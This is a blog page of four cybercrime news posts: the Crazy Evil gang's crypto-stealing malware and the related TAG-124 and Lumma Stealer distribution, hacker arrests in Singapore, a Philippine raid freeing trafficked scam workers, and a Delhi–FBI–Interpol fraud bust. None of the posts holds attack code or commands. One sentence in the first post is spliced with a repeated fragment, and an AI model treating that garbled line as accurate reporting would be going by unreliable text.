Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label cybercrime syndicate. Show all posts
social media scams
cryptocurrency theft cybercrime syndicate information stealers malware social media scams

Crazy Evil Gang Strikes Crypto Sector with StealC, AMOS, and Angel Drainer Malware

 


A Russian-speaking cybercrime syndicate, Crazy Evil, has been tied to more than 10 active social media scams, employing diverse tactics to trick victims into installing malicious software such as StealC, Atomic macOS Stealer (AMOS), and Angel Drainer.

"Specializing in identity fraud, cryptocurrency theft, and information-stealing malware, Crazy Evil operates a sophisticated network of traffers — social engineering specialists tasked with redirecting legitimate traffic to malicious phishing sites," stated Recorded Future's Insikt Group in their analysis.

The group's varied malware arsenal indicates that its targets include both Windows and macOS users, posing a significant threat to the decentralized finance sector.

Crazy Evil, active since at least 2021, mainly operates as a traffer team, redirecting legitimate traffic to fraudulent landing pages controlled by other criminal entities. It is allegedly managed by a figure known as @AbrahamCrazyEvil on Telegram, where the group has over 4,800 subscribers (@CrazyEvilCorp).

Unlike typical scams that create counterfeit shopping websites for fraudulent transactions, Crazy Evil focuses on stealing digital assets, including NFTs, cryptocurrencies, payment card information, and online banking credentials. The group is believed to have generated over $5 million in illicit revenue, impacting thousands of devices worldwide.

The group's notoriety has grown following exit scams involving two other cybercrime outfits—Markopolo and CryptoLove—which were previously associated with a ClickFix campaign involving fake Google Meet pages in October 2024.

"Crazy Evil explicitly targets the cryptocurrency sector with custom spear-phishing lures," Recorded Future noted. "Crazy Evil traffers often spend days or even weeks scouting operations, identifying targets, and initiating engagements."

In addition to orchestrating attacks that deliveThe group's notoriety has grown following exit scams involving two other cybercrime outfits—Markopolo and CryptoLover information stealers and wallet-draining malware, the group's leaders offer training materials and guidance for traffers, alongside an affiliate structure to delegate operations.

Crazy Evil is the second cybercrime group after Telekopye to be exposed in recent years, with its operations centered around Telegram. New recruits are guided by a Telegram bot controlled by the threat actor to various private channels, such as:

  • Payments: Announcing earnings for traffers
  • Logbar: Tracking information-stealer attacks and stolen data
  • Info: Offering regular updates on administrative and technical matters
  • Global Chat: A central space for communication, from work-related topics to casual discussions
The group operates through six sub-teams—AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, and KEVLAND—each responsible for specific scams involving the installation of malicious tools via fake websites.

"As Crazy Evil continues to thrive, other cybercriminal groups are likely to mimic its tactics, urging security teams to stay alert to avoid large-scale breaches and loss of trust within the cryptocurrency, gaming, and software sectors," said Recorded Future.

This revelation follows the discovery of a traffic distribution system (TDS) named TAG-124, which overlaps with activity clusters linked to multiple threat groups, including Rhysida ransomware, Interlock ransomware, and SocGholish. This TDS is used in initial infection chains to distribute malware, such as the Remcos RAT and CleanUpLoader, which serves as a conduit for both Rhysida and Interlock ransomware.

"TAG-124 is composed of compromised WordPress sites, actor-controlled payload servers, and additional components," explained Recorded Future. "When specific criteria are met, these sites display fake Google Chrome update landing pages, leading to malware infections."

The use of TAG-124 further links Rhysida and Interlock ransomware strains, with newer variants employing the ClickFix technique, which instructs visitors to execute a command copied to their clipboard to trigger the malware infection.

Compromised WordPress sites, totaling over 10,000, have been used to distribute AMOS and SocGholish as part of client-side attacks.

"JavaScript loaded in the user's browser generates a fake page within an iframe," said researcher Himanshu Anand. "Attackers exploit outdated WordPress versions and plugins to avoid detection by websites lacking client-side monitoring tools."

Additionally, threat actors have leveraged the trust in platforms like GitHub to distribute malicious installers leading to the deployment of Lumma Stealer and other payloads, including SectopRAT, Vidar Stealer, and Cobalt Strike Beacon.

Trend Micro highlighted that this activity shares similarities with the tactics used by the threat actor Stargazer Goblin, known for utilizing GitHub repositories for payload distribution. However, the key difference is that the infection chain begins with compromised websites that redirect to malicious GitHub release links.

"The Lumma Stealer distribution method is evolving, with the attacker now using GitHub repositories to host malware," said security researchers Buddy Tancio, Fe Cureg, and Jovit Samaniego.

"The malware-as-a-service (MaaS) model makes it easier for cybercriminals to execute sophisticated cyberattacks, simplifying the spread of threats like Lumma Stealer."

In a comment to The Hacker News, Antonis Terefos, a reverse engineer at Check Point Research, noted that the Stargazer Goblin group has been observed "shifting from Atlantida Stealer to Lumma, and testing other stealers."
Read more »
Singapore
cryptocurrency cybercrime syndicate malware PlugX Singapore

Six Hackers Linked to Worldwide Cyber Attacks Arrested in Singapore


The Singaporean authorities have detained six people believed to be associated with a global cybercrime syndicate suspected of masterminding malicious cyber activities all over the world, latest reports said.

The arrest was a result of an extensive operation carried out by various law enforcement agencies in Singapore, further highlighting the growing complexity and reach of organised cybercrime.

The notion that hackers work in some sort of relative isolation is the furthest from the truth. The most substantial cyberattacks committed today are the work of organised crime or even state actors. The groups are very well organised and may be working in multiple countries to fulfil their objectives. To illustrate, North Korea-associated hacking entities have successfully withdrawn billions of dollars in ransomware attacks. These hackers don't work alone but instead use the assistance of other cyber-thieves who introduce them to sensitive information, corporate infrastructure, or digital tools which they use to push malware.

On September 9, 2024, Singapore's police conducted an operation of a large-scale raid comprising 160 officers from the Criminal Investigation Department, the Police Intelligence Department, the Special Operations Command, and the Internal Security Department. The raid was executed over several residential locations in Singapore and resulted in the arrest of six people- five Chinese nationals and one Singaporean. Members of these suspects have been associated with an international cybercrime group that is conducting its unlawful activities all over the world on the net.

Official sources claim that the suspects are connected to a gang engaged in malicious cyber activities from Singapore. During the operation, this resulted in the seizure of several devices, including hacking tools and personal data stolen from outside Singapore, as well as malware control software such as PlugX. Authorities further claim that they have seized about $850,000 worth of cryptocurrency from the suspects.

Even as the six men have been nabbed, investigations by the Singaporean police are still underway to find out their local network and connections with the worldwide cybercrime syndicate. Further investigations may throw more light on how all the cyber operations were executed from this location of Singapore.

The arrests once more underscore the cyber aspect, as criminal syndicates are using borderless operations to victimise private citizens, companies, and governments across the world. Singapore has acted quickly by arresting these hackers in the pursuit of controlling cybercrime and by underlining the importance of international cooperation, especially in fighting emerging threats.

This reminds one that cybercrime is a large and structured industry that goes beyond the hacker's operation. These criminal organisations are widely spread, and members of the outfit perform various other functions in an attack, including unauthorised access to computer systems and spewing of malware. The arrests are a blow to law enforcement agencies in Singapore, but further proof of the systemic problem of cybercrime on the global level.

International authorities have to come together, especially as cybercriminals get more clever and organised. The kind of cooperation between countries, of which the recent Singapore arrest is just a proof, helps dismantle the syndicates and bring before the law its perpetrators.



 

Read more »
User Security
Cyber Crime cybercrime syndicate Online Gaming Philippines Police User Security

Philippines Police Rescues 2,700 Individuals from Cybercrime Syndicate

 

More than 2,700 workers from China, the Philippines, Vietnam, Indonesia, and over a dozen other countries were reportedly lured into working for shady online gaming sites and other cybercrime organisations, according to Philippine police who claimed they rescued them in a massive raid on Tuesday with the support of commandos. 

The number of victims of human trafficking rescued from seven buildings in Las Pinas city, metropolitan Manila, and the size of the midnight police raid were the biggest this year, demonstrating how the Philippines has developed into a significant hub for cybercrime syndicates.

With reports of people from the region and beyond being duped into accepting jobs in nations like conflict-torn Myanmar and Cambodia, cybercrime scams have grown to be a significant problem throughout Asia. However, a lot of these workers find themselves ensnared in a form of virtual slavery and compelled to take part in online frauds that prey on unsuspecting victims.

At a summit in Indonesia in May, ASEAN leaders decided to bolster border security, law enforcement, and public education in order to combat organised crime groups that smuggle people abroad and force them to engage in online fraud. 

According to Brig. Gen. Sydney Hernia, head of the national Philippine police's anti-cybercrime unit, police in Las Pinas, Philippines, raided and searched the buildings around midnight and freed 1,190 foreigners from at least 17 countries, including 604 Chinese, 183 Vietnamese, 137 Indonesians, 134 Malaysians, and 81 Thais. 

In total, 1,534 Filipinos were also saved. There were also a few people from Nigeria, Sudan, Somalia, Yemen, Myanmar, Pakistan, Taiwan, and Sudan. It wasn't immediately apparent how many alleged syndicate leaders had been detained.

Earlier this year in May, police said they arrested over 1,400 Filipino and international labourers who were allegedly forced to work on cryptocurrency schemes during a raid on another suspected cybercrime camp at the Clark freeport in Mabalacat city, Pampanga province, north of Manila. 

Police said that several of the employees testified to investigators that when they attempted to resign, they were required to pay a sizable sum for unclear reasons or they were concerned that they would be sold to other syndicates. They also added that employees were also required to pay fines for alleged workplace breaches. 

Facebook adverts used great working circumstances and big wage offers to entice workers, but, according to officials, the claims turned out to be a deception. 

Indonesian Minister Muhammad Mahfud, who handles political, legal, and security matters, told reporters that his country and other nations in the area had trouble cooperating with Myanmar on issues relating to cybercrime and its victims. He asserted that ASEAN must move forward on a long-proposed regional extradition convention in order to aid law enforcement in prosecuting offenders more quickly and stop the spread of cybercrime.
Read more »
Joint Operation
Cyber Crime cybercrime gang cybercrime syndicate Delhi Police FBI IFSO Interpol Interpol Operation Joint Operation

Delhi Police, FBI & Interpol in a Joint Operation Expose a Cybercrime Syndicate, Arrested Four


In a joint operation, Delhi Police, the Federal Bureau of Investigation (FBI), and Interpol have exposed an international syndicate involved in cybercrime, arresting four individuals involved in the cybercrime gang.

The four members, including the kingpin, were detained for allegedly conning the US nationals of 20 million dollars.

According to a statement provided by a Delhi Police official, the information regarding the cybercrimes was received by their Intelligence Fusion & Strategic Operations (IFSO) unit – which deals with complex cybercrime cases – from the FBI and Interpol. The agencies indicated that “some international cybercriminals, in conspiracy with each other and with the aid and assistance of co-conspirators based in India, the US and Uganda, were running call centers by posing as employees of the US Internal Revenue Service, Social Security Administration, Drug Enforcement Administration, and other US agencies,” said H.G.S. Dhaliwal, Special Commissioner Police (Delhi Police Special Cell).

“We received information that one accused, Parth Armarkar, impersonated a specific living person by the name of Uttam Dhillon. During his career, the real Uttam Dhillon served as the Acting Administrator of the US Drug Enforcement Administration and as the Director of INTERPOL Washington. Armarkar defrauded victims of millions of USD through call centers operating in Uganda, Africa. He is an Indian national and occasionally visits India,” Dhaliwal said.

The accused Armarkar, allegedly defrauded the victims of around $6 million via phony call centers in Uganda. Later, the technical inputs provided by the FBI helped Delhi police arrest the accused from Ahmedabad, India, apparently the place from where he was operating a segment of the syndicate.

Keeping in mind the severity of the situation, the Delhi Police established several teams of IFSO and Counter Intelligence/Special Cell to investigate on the issue.

Armarkar’s arrest was followed by the Delhi police tracking down the alleged leader of the syndicate, Vatsal Mehta. Further investigation led to the arrest of two more accused, Deepak Arora and Prashant Kumar. According to the police, the accused were on the FBI radar for a very long time.

As part of the coordinated action, the FBI has interviewed over 50 victims so far and collected evidence of fraud amounting to more than 20 million USD, which will be produced in court as per procedure. “Two victims from the US have also been examined through video calling by IFSO (Intelligence Fusion & Strategic Operations),” the officials noted.

The First Information Report (FIR) was lodged against the four accused under section 419 (cheating done by impersonation), 420 (cheating), 384 (extortion), 120B (criminal conspiracy), 34 (acts by many in furtherance of common intention) of the Indian Penal Code and sections 66C (identity theft) and 66D (impersonation) of the IT Act.

Read more »
Subscribe to: Posts (Atom)